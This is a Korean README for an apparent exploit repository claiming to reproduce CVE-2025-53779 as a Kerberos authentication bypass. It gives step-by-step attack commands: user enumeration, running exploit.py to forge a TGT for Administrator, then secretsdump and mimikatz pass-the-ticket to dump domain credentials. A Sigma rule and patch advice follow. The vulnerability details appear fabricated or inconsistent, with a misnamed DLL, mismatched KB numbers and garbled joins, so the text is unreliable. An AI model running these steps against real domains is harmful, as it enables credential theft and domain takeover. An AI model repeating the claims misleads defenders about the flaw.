
Reproduction of cve-2025-53779-kerberos_bypass_reproduction
CVSS 점수: 9.8(치명적)
상태: 실제 환경에서 활발한 악용 중
공개: Microsoft 2025년 8월 패치 화요일(제로데이)
CVE-2025-53779는 Microsoft Windows Kerberos 프로토콜 구현에서 발생하는 치명적인 인증 우회 취약점입니다. 인증되지 않은 공격자는 유효한 자격 증명이나 암호화 자료를 보유하지 않고도 이 결함을 악용하여 Kerberos 인증을 완전히 우회하고 도메인 관리자를 포함한 모든 도메인 사용자를 가장할 수 있습니다.
Microsoft는 낮은 공격 복잡성, 요구되는 권한 없음, 사용자 상호 작용 불필요, 그리고 도메인 가입 시스템의 완전한 손상 가능성으로 인해 이 취약점에 CVSS 9.8(치명적) 등급을 부여했습니다.
이 취약점은 Windows 도메인 컨트롤러의 Kerberos 키 배포 센터(KDC) 서비스(kdsvc.dll)에 존재합니다. 구체적으로, 권한 특성 인증서(PAC) 검증 루틴의 검증 로직 오류로 인해 공격자가 표준 인증 검사를 우회하는 AS-REQ 또는 TGS-REQ 메시지를 구성할 수 있습니다.
kdsvc.dllKerberos 메시지 본문에 특정 플래그가 설정되면 KDC는 PAC 구조의 pac-signature-data 필드를 제대로 검증하지 못합니다. 조작된 PA-PAC-REQUEST padata 유형과 위조된 인증 데이터 항목이 포함된 특수하게 제작된 AS-REQ를 전송함으로써, 공격자는 해당 장기 키 없이도 임의의 사용자 주체 이름(UPN)에 대한 티켓 부여 티켓(TGT)을 발급하도록 KDC를 속입니다.
이 공격은 사전 인증을 우회하며(REQUIRES_PRE_AUTH 플래그가 사실상 무시됨) PAC 검증을 완전히 건너뛰므로, 생성된 티켓에 임의의 그룹 구성원 자격(예: Domain Admins, Enterprise Admins)이 포함될 수 있습니다.
2025년 8월 보안 업데이트 이전의 지원되는 모든 Windows Server 버전이 영향을 받습니다:
참고: Windows 클라이언트 버전(Windows 10, Windows 11)은 KDC 서비스를 실행하지 않으므로 영향을 받지 않습니다.
impacket 라이브러리가 설치된 Python 3.8+exploit.py)pip install impacket pycryptodome
또는 제공된 requirements.txt 사용:
pip install -r requirements.txt
Nmap을 사용하여 Kerberos 서비스를 발견합니다:
nmap -sU -p 88 --script krb5-enum-users <target-ip>
또는 내장된 Kerberos 스캐닝을 사용합니다:
python exploit.py --scan <target-ip>
도메인 사용자를 모르는 경우 Kerberos AS-REP roasting 또는 LDAP를 통해 열거합니다:
python exploit.py --enum <target-ip> <domain>
대상 사용자에 대한 위조 TGT를 생성합니다:
python exploit.py --dc-ip <dc-ip> --domain <domain> --target-user <username>
예시:
python exploit.py --dc-ip 192.168.1.10 --domain corp.local --target-user Administrator
익스플로잇은 Kirbi 형식의 티켓 파일을 출력합니다. Impacket 도구를 사용하여 검증합니다:
# Export the ticket
set KRB5CCNAME=ticket.kirbi
# Use the ticket to access a resource
python examples/secretsdump.py -k -no-pass <domain>/Administrator@<target>
유효한 TGT를 획득한 후에는 다음을 수행할 수 있습니다:
secretsdump.py -k -no-pass domain/Administrator@<dc>mimikatz "kerberos::ptt ticket.kirbi"동봉된 exploit.py는 다음과 같은 공격 흐름을 구현합니다:
PA-PAC-REQUEST 필드와 조작된 인증 데이터가 포함된 수정된 AS-REQ 메시지 구축kdsvc.dll의 취약한 코드 경로를 트리거하는 특정 비트 플래그를 요청 본문에 설정Attacker Domain Controller (KDC)
| |
| AS-REQ (forged PA-PAC-REQUEST) |
| - cname: Administrator |
| - sname: krbtgt/DOMAIN |
| - padata: PA-PAC-REQUEST + |
| forged auth-data |
|------------------------------------->|
| |
| [Vulnerable Path] |
| 1. KDC receives AS-REQ |
| 2. Checks PA-PAC-REQUEST flag |
| 3. **Bypasses pre-auth check** |
| 4. Skips PAC verification |
| 5. Generates TGT with arbitrary |
| groups via auth-data |
| |
| AS-REP (forged TGT) |
| - Encrypted with krbtgt key |
| - Contains forged PAC |
|<-------------------------------------|
| |
| TGS-REQ (use forged TGT) |
| - Request service ticket |
| - For any service (CIFS, LDAP, |
| HTTP, HOST) |
|------------------------------------->|
| |
| TGS-REP (service ticket) |
| - Legitimate service ticket |
| - Attacker can now access |
| any resource |
|<-------------------------------------|
Microsoft 2025년 8월 패치 화요일 업데이트 적용 — 이것이 주요 수정 사항입니다. 해당 KB는 위의 영향을 받는 버전 표를 참조하십시오.
악용 시도 모니터링:
네트워크 세분화:
추가 로깅 활성화:
NetworkProvider\Kerberos\Operational)Sigma 규칙(사전 인증 없는 AS-REQ):
title: CVE-2025-53779 Kerberos Authentication Bypass
logsource:
product: windows
service: security
detection:
selection:
EventID: 4768
PreAuthenticationType: 0 # No pre-authentication required
condition: selection
falsepositives:
- Users with "Do not require Kerberos preauthentication" set
이 저장소는 교육 및 공인된 보안 테스트 목적으로만 제공됩니다. 소유하지 않았거나 명시적인 서면 테스트 허가를 받지 않은 시스템에 대해 CVE-2025-53779를 무단으로 악용하는 것은 불법입니다. 저자는 이 정보의 오용에 대해 책임을 지지 않습니다.
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다 - 자세한 내용은 LICENSE 파일을 참조하십시오.
| Windows 버전 | 영향 여부 | 수정 업데이트 |
|---|
| Windows Server 2025 | ✅ 예 | KB5044289 |
| Windows Server 2022 | ✅ 예 | KB5044285 |
| Windows Server 2019 | ✅ 예 | KB5044277 |
| Windows Server 2016 | ✅ 예 | KB5044293 |
| Windows Server 2012 R2 | ✅ 예 | KB5044297 |
| Windows Server 2012 | ✅ 예 | KB5044291 |
| Windows Server 2008 R2 (ESU) | ✅ 예 | KB5044301 |
| Windows Server 2008 (ESU) | ✅ 예 | KB5044303 |